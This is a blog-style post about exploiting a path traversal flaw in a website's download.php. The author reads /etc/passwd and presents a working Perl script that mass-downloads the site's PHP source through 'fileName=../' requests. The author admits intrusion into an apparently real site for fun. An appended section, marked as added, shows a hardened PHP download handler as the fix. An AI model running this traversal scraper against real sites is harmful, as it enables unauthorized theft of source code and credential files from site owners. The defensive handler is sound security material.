Script source code disclosure could mean full compromise
Hello,
I have been playing lately with the security of some websites, since it was extremely boring for me, after finishing my exams, to have nothing better to do. Yeah, I know I still have to finish the CCNA course and get that over with, but call me lazy; I've wasted a lot of valuable time.
Never mind that for a second. What I bring you today is a closer look at website security and what a simple human error could do to your website.
Take for example our website today, http://vulnerable.edu.xx [link kept private because, well, I might have some black hat touch here, but I still don't want anyone to compromise the website for fun! As we all know, it was always for "educational purposes only"]. The website appeared to be vulnerable to script source code disclosure, which enabled me to get a copy of every single file on the website that appeared in my crawler, including the famous 'passwd' file [unfortunately the passwords were kept encrypted in the 'shadow' file; it wasn't hard to guess the path once I had the ability to get any file].
So with some quick and dirty Perl code I wrote in a rush (it took me about half an hour to learn some basics), I managed to download a copy of my beloved PHP files that were located on that host:
use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

# files.txt holds one site-relative path per line (the crawler output)
open (handle, 'files.txt') or die "Can't open files.txt";
mkdir "site";
chdir "./site";

while (<handle>) {
    chomp;
    my ($filename, $directories) = fileparse("$_");
    my @dir = split('/', $directories);

    # recreate the remote directory structure locally and descend into it
    my $i = 0;
    while ($dir[$i]) {
        mkdir $dir[$i];
        chdir './' . $dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    # the download script accepts a relative path in fileName
    my $url = 'http://vulnerable.edu.xx/common/download.php?';
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url . "\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
        unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
        unless $response->content_type eq 'application/download';

    open (file, '>' . $filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);
    print "saving " . $directories . $filename . "\n";

    # climb back up to the "site" directory
    for (; $i >= 0; $i--) {
        chdir('../');
    }
}

Just an example, one of the folders.
Let's hope it's not your site.
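
The server-side fix for this class of bug, as an added example that is not part of the original post or the site's code: a download handler that canonicalizes the requested name and refuses anything that resolves outside one directory or is not an allowlisted file type. The root path, the extension allowlist and the function name `resolve_download` are assumptions.

```php
<?php
// Added example: hardened replacement for a download.php-style handler.
// DOWNLOAD_ROOT and ALLOWED_EXT are assumed values, not taken from the site.
const DOWNLOAD_ROOT = '/var/www/downloads';          // the only directory ever served
const ALLOWED_EXT   = ['pdf', 'doc', 'zip', 'txt'];  // no script or config types

/**
 * Map a user-supplied fileName to a real path inside $root,
 * or return null if the request must be refused.
 */
function resolve_download(string $requested, string $root = DOWNLOAD_ROOT): ?string
{
    // Reject empty names and NUL bytes (older PHP versions truncated paths at NUL).
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses ../ and follows symlinks; false means "does not exist".
    $rootReal = realpath($root);
    $target   = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($rootReal === false || $target === false || !is_file($target)) {
        return null;
    }
    // The canonical path must still sit under the root. The trailing separator
    // stops /var/www/downloads-old from matching /var/www/downloads.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Serve only allowlisted document types, never .php or dotfiles.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $target : null;
}

// Handle a request only under a web SAPI, so the function can be included and tested.
if (PHP_SAPI !== 'cli') {
    $name = $_GET['fileName'] ?? '';
    $path = resolve_download(is_string($name) ? $name : '');
    if ($path === null) {
        http_response_code(404);   // same answer for "missing" and "forbidden"
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'
        . str_replace('"', '', basename($path)) . '"');
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}
```

With this check, a request such as `fileName=../index.php` resolves outside the download root and gets a 404 instead of the script's source.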